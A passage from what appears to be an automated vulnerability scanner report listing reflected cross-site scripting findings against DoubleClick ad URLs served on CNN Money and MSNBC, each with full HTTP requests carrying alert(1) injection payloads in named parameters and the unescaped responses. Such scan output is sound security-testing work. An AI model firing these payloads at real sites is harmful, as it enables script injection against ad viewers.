Expires: Wed, 23 Mar 2011 19:46:33 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7736

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Dec 20 16:08:37
...[SNIP]...
375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,478054304a"-alert(1)-"cda7ed7f77b&Values=1589&Redirect=http%3a%2f%2fwww.ibm.com/innovation/us/leadership/hospitals/index.html%3Fcmp%3DUSBRB%26cm%3Db%26csr%3Dagus_itlead-20101213%26cr%3Dcnnmoney%26ct%3DUSBRB301%26cn%3Dcapleadhosp");
va
...[SNIP]...

1.24. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6db"-alert(1)-"ee09ebde4b3 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211cb6db"-alert(1)-"ee09ebde4b3&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:45:59 GMT
Expires: Wed, 23 Mar 2011 19:45:59 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7736

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Dec 20 16:08:37
...[SNIP]...
click%3Bh%3Dv8/3ad3/f/1eb/%2a/n%3B233540379%3B1-0%3B0%3B57088445%3B3454-728/90%3B39920662/39938449/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211cb6db"-alert(1)-"ee09ebde4b3&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,422
...[SNIP]...

1.25. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8474b"-alert(1)-"44fd70d9e1a was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15898474b"-alert(1)-"44fd70d9e1a&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:46:55 GMT
Expires: Wed, 23 Mar 2011 19:46:55 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7714

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Mar 08 09:18:11
...[SNIP]...
423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15898474b"-alert(1)-"44fd70d9e1a&Redirect=http%3a%2f%2fwww.ibm.com/innovation/us/leadership/response/index.html%3Fcmp%3DUSBRB%26cm%3Db%26csr%3Dagus_itlead-20110307%26cr%3Dcnnmoney%26ct%3DUSBRB301%26cn%3Dcapleadmadrid");
var fscUrl =
...[SNIP]...

1.26. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ed9b"-alert(1)-"f9a28dd4132 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click7ed9b"-alert(1)-"f9a28dd4132&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:44:16 GMT
Expires: Wed, 23 Mar 2011 19:44:16 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7736

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Dec 20 16:08:37
...[SNIP]...
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1eb/%2a/n%3B233540379%3B1-0%3B0%3B57088445%3B3454-728/90%3B39920662/39938449/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click7ed9b"-alert(1)-"f9a28dd4132&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,3
...[SNIP]...

1.27. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 465d9'-alert(1)-'6e4ac7352f1 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962465d9'-alert(1)-'6e4ac7352f1&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:39 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962465d9'-alert(1)-'6e4ac7352f1&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/
...[SNIP]...

1.28. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f478"-alert(1)-"6eea3e74b0f was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=81349621f478"-alert(1)-"6eea3e74b0f&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:35 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
lider_flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=81349621f478"-alert(1)-"6eea3e74b0f&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/
...[SNIP]...

1.29. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354da'-alert(1)-'5924229b624 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616354da'-alert(1)-'5924229b624&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:05 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616354da'-alert(1)-'5924229b624&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f56ab"-alert(1)-"142e0c6b3d9 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616f56ab"-alert(1)-"142e0c6b3d9&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:00 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
ar minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616f56ab"-alert(1)-"142e0c6b3d9&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d9e5'-alert(1)-'012306d0300 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106376d9e5'-alert(1)-'012306d0300&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:36 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
rget=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106376d9e5'-alert(1)-'012306d0300&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8be26"-alert(1)-"8859d5c8fb3 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106378be26"-alert(1)-"8859d5c8fb3&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:28 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106378be26"-alert(1)-"8859d5c8fb3&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48f6a'-alert(1)-'dc0d0d0b99c was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM448f6a'-alert(1)-'dc0d0d0b99c&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:16 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM448f6a'-alert(1)-'dc0d0d0b99c&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83a9"-alert(1)-"0a5f61e11f5 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4e83a9"-alert(1)-"0a5f61e11f5&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
